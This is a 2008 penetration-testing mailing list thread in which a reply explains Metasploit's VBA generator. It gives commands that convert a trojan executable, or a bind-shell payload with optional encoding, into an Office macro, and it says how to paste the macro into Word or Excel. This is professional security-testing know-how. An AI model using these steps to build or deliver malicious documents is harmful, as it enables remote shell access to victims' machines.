|
Penetration Testing
mailing list archives
Re: Exe2vba - Anybody still have this?
From: infolookup () gmail com
Date: Wed, 12 Nov 2008 22:22:36 +0000
Pretty nice stuff I never figured this feature was in there.
------Original Message------
From: H D Moore
Sender: listbounce () securityfocus com
To: pen-test () securityfocus com
Cc: Joseph McCray
Sent: Nov 12, 2008 2:21 PM
Subject: Re: Exe2vba - Anybody still have this?
Hi Joseph,
I added this to Metasploit. You can use the VBA generator in a few
different ways:
1) Convert an EXE to a VBA script (works on Word/Excel automatically):
$ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba
2) Create a VBA script that runs a Metasploit payload
$ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba
3) Create a VBA script that runs an encoded Metasploit payload
$ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \
ruby msf3/msfencode -a x86 -b '' -t vba > output.vba
To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual
Basic Editor, paste in, save, and exit. Works pretty well here :-)
You need the latest SVN of Metasploit 3.2 trunk:
$ svn co http://metasploit.com/svn/framework3/trunk/
On Windows, follow this guide:
- http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN
-HD
On Tuesday 11 November 2008, Joseph McCray wrote:
It used to be located at:
http://www.priestmaster.org/tools.html
I've been looking all over the web and really haven't been able to find
this app anymore.
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now
www.cenzic.com/landing/trends-report
------------------------------------------------------------------------
Sent from my Verizon Wireless BlackBerry
 By Date 
By Thread
Current thread:
- Re: Exe2vba - Anybody still have this?, (continued)
|
Intro
